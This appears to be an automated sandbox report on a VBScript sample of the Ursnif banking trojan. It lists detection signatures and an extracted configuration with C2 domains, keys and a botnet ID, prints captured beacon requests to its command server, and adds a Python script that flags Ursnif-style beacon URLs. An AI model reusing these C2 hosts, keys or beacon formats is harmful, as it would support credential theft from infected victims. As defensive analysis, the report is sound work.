Windows Analysis Report 345678.vbs

Overview

General Information

Sample Name: 345678.vbs
Analysis ID: 481077
MD5: 9e6b216f5112b583f035ac621c78ea4e
SHA1: 8e1636abf1eb1dd966dce2b92fd44a1d9a3e32d3
SHA256: cbf23e2c51909c02fc3898b4fb078cb1fc08935874add1c045c592096ff18379

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Disables SPDY (sets EnableSPDY3_0 = 0 so the browser stays on plain HTTP/1.1, which the web-inject hooks can read and alter; likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/t Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com Virustotal: Detection: 8%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_00E53276
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdb@ source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.pdbXP+s source: powershell.exe, 0000001F.00000002.777223322.0000021753319000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000001.00000003.535291067.000001763BDE4000.00000004.00000001.sdmp, fum.cpp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.679916325.0000000005A50000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 21_2_05591802
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 21_2_05581577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 21_2_055714A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 21_2_05586E4E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49787 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49788 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49789 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49789 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253
Source: rundll32.exe, 00000015.00000003.618180759.00000000008E3000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P
Source: rundll32.exe, 00000015.00000002.737109785.000000000088A000.00000004.00000020.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/t
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001F.00000003.646082530.00000217679BC000.00000004.00000001.sdmp String found in binary or memory: http://crl.m5
Source: rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001F.00000002.742877071.000002174F421000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001F.00000003.643291434.0000021767840000.00000004.00000001.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
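The Snort hits above (ET 2033203 "URI Struct M1 (_2B)" and 2033204 "URI Struct M2 (_2F)") key on the shape of the beacon path rather than on its content. What follows is an added example, not code from the Joe Sandbox report and not Ursnif's own encoder: a structural check in the spirit of those two rules, plus the normalisation step that turns the path back into base64. It assumes, as the rule names suggest, that `_2B`, `_2F` and `_3D` stand in for the `%2B`, `%2F` and `%3D` escapes of the base64 characters `+`, `/` and `=`, and that the slashes are inserted after encoding. The report's own requests support the second assumption: in the second GET the segment boundary `Wei_2/FhXB` splits an escape, so a per-segment match would miss it and the path has to be joined first. The three `atl.bigbigpoppa.com` URLs are the ones recorded above; the two `example.test` URLs are constructed benign controls. What the base64 yields is still ciphertext (the extracted config carries a `serpent_key`), so the example stops at its length.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit

# The three beacon URLs below are the ones recorded in this report; the two
# example.test URLs are constructed benign controls.
SAMPLE_URLS = [
    "http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw",
    "http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT",
    "http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e",
    "http://example.test/images/logo_2021.png",
    "http://example.test/api/v1/users/42/profile/settings/",
]

# Every path segment must look like base64 text plus the underscore escape marker.
SEGMENT_RE = re.compile(r"^[A-Za-z0-9_]+$")


def looks_like_ursnif_uri(path: str) -> bool:
    """Structural check modelled on ET 2033203/2033204: a long path made only of
    base64-like segments that carries the _2B / _2F escapes. Assumption: _xx is
    the stand-in for the %xx URL escape."""
    segments = [s for s in path.split("/") if s]
    if len(segments) < 4 or len(path) < 60:
        return False
    if not all(SEGMENT_RE.match(s) for s in segments):
        return False
    # Join before matching: an escape can straddle a slash (e.g. "Wei_2/FhXB").
    joined = "".join(segments)
    return "_2B" in joined or "_2F" in joined


def normalize_beacon_path(path: str) -> str:
    """Drop the inserted slashes, then restore the base64 alphabet."""
    joined = "".join(path.split("/"))
    return joined.replace("_2B", "+").replace("_2F", "/").replace("_3D", "=")


def decode_beacon_blob(path: str):
    """Base64-decode the normalised path; the result is still Serpent ciphertext.
    Returns None when the text is not valid base64 (e.g. a truncated capture)."""
    b64 = normalize_beacon_path(path)
    try:
        return base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
    except binascii.Error:
        return None


def classify(url: str) -> dict:
    parts = urlsplit(url)
    hit = looks_like_ursnif_uri(parts.path)
    normalized = normalize_beacon_path(parts.path) if hit else None
    blob = decode_beacon_blob(parts.path) if hit else None
    return {"host": parts.hostname, "ursnif_uri": hit, "normalized": normalized,
            "ciphertext_len": len(blob) if blob is not None else None}


if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = classify(u)
        print(r["host"], r["ursnif_uri"], r["ciphertext_len"])
```

The structural check is deliberately loose (four or more slash-separated base64-like segments, sixty-plus characters, at least one escape), so on live traffic it should be paired with the host, the Firefox/90.0 user agent on a non-browser process, and the absence of a `Referer`, as the capture above shows.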

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
